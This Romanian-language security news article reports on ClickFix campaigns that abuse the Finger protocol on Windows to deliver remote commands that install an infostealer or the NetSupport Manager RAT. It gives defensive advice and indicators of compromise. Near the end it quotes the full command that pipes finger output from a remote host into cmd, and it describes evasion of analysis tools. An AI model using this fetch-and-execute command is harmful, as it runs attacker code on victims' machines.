Comunicarea simplă între calculatoare provine din vremuri îndepărtate: protocolul Finger, folosit odinioară pentru a obține rapid informații despre utilizatori pe sisteme Unix și Linux, și care la un moment dat a apărut și pe Windows, este din nou utilizat, de data aceasta în campanii malițioase care livrează comenzi de la distanță către sistemele vizate. Revenirea acestei unelte vechi evidențiază cum instrumente de zi cu zi pot fi adaptate pentru scopuri diferite, la fel cum s-a întâmplat cu alte utilitare clasice transformate în LOLBIN-uri.
Finger era cândva folosit pentru a afișa detalii de bază despre un cont: numele de conectare, numele real din /etc/passwd dacă era setat, directorul home, numere de telefon și ultima sesiune. Astăzi, funcționalitatea este rar utilizată legitim, dar suportul pentru protocol încă există, iar asta oferă posibilități de abuz. Recent, cercetătorii au descoperit campanii în care atacatorii apelează comanda finger pe Windows pentru a primi de la un server remote scripturi care sunt apoi executate local, adesea prin redirecționarea ieșirii comenzii către cmd.exe. Practic, finger devine un canal de livrare pentru comenzi la distanță.
Un cercetător din comunitate a publicat un fișier batch care folosește finger [email protected][.]com pentru a aduce comenzi și a le transmite către cmd.exe. Chiar dacă acea gazdă nu mai răspunde, au apărut alte probe și campanii similare. Pe Reddit, cineva a povestit că a căzut victimă unei înșelătorii de tip ClickFix care afișa un captcha fals și l-a convins să ruleze o comandă Windows pentru a „dovedi că este om”. Comanda introdusă a apelat finger [email protected][.]org și a trimis rezultatul direct către cmd, ceea ce a făcut ca instrucțiunile primite de la server să fie executate.
Schema tipică descărca și rula un set de comenzi care crea un folder cu nume aleator, copia curl.exe sub un alt nume, folosea acel curl redenumit pentru a descărca un fișier zip mascat ca PDF de pe cloudmega[.]org și extrăgea un pachet Python malițios. Apoi, pachetul Python era lansat cu pythonw.exe __init__.py, iar la final scriptul raporta serverului că s-a executat și menținea afișat mesajul fals Verify you are human pentru a nu stârni suspiciuni. Indiciile dintr-un alt fișier batch sugerează că pachetul Python ar fi avut funcții de colectare a informațiilor (infostealer).
O altă campanie folosește finger [email protected] | cmd pentru a obține comenzi aproape identice. Aceasta pare mai sofisticată: înainte de a continua, scripturile caută instrumente folosite de analiștii de malware, filemon, procexp, tcpview, Procmon, Wireshark, Fiddler, IDA, x64dbg, OllyDbg, ProcessHacker și altele, și se opresc dacă detectează astfel de unelte. Dacă nu sunt identificate, descarcă arhive mascate ca PDF și extrag de această dată pachetul NetSupport Manager RAT. Ulterior, scripturile configurează o sarcină programată pentru a porni RAT-ul la logarea utilizatorului, asigurând persistența.
Deși pare opera unui singur actor ce folosește metoda ClickFix, persuasiunea prin „verifică că ești om” continuă să înșele persoane grăbite. Pentru apărători, cea mai directă modalitate de a bloca acest tip de abuz este restricționarea traficului de ieșire pe portul TCP 79, folosit de protocolul Finger. De asemenea, se recomandă monitorizarea activității care invocă executabilele sistemului pentru a procesa date obținute prin canale neobișnuite.
Acțiunile descrise demonstrează cum un protocol vechi, uitat de mulți, poate transmite comenzi capabile să descarce și să ruleze pachete malițioase precum un infostealer sau NetSupport Manager RAT. Exemple concrete menționate includ hosturile finger.nateams[.]com, cloudmega[.]org și api.metrics-strange.com, comenzile care pipe-uiesc finger către cmd și instrumentele detectate de scripturi precum curl.exe, pythonw.exe, precum și lista extinsă de utilitare de analiză pe care atacatorii le evită. Blocarea portului 79 și supravegherea proceselor care rulează comenzi redirecționate sunt măsuri practice care pot împiedica astfel de campanii.
NetSupport Manager apare ca unul dintre payload-urile extrase, iar comanda exactă folosită de victime ar fi putut arăta astfel: cmd /c start “” /min cmd /c “finger [email protected][.]org | cmd” && echo’ Verify you are human–press ENTER’. Aceasta arată că un simplu apel la Finger poate transforma un utilitar învechit într-un canal de distribuție a malware-ului. Creșterea vigilenței asupra traficului pe porturi istorice și validarea comenzilor introduse manual de utilizatori pot reduce eficiența atacurilor ClickFix.
Un element concret din text este portul TCP 79, folosit de protocolul Finger, care rămâne punctul cheie de intervenție pentru a bloca astfel de abuzuri. Luați în considerare numele gazdelor menționate (finger.nateams[.]com, cloudmega[.]org, api.metrics-strange.com) când investigați trafic neobișnuit. Care credeți că ar fi cel mai eficient pas pe care echipa voastră de securitate l-ar implementa imediat pentru a reduce riscul unor astfel de atacuri?
Fii primul care comentează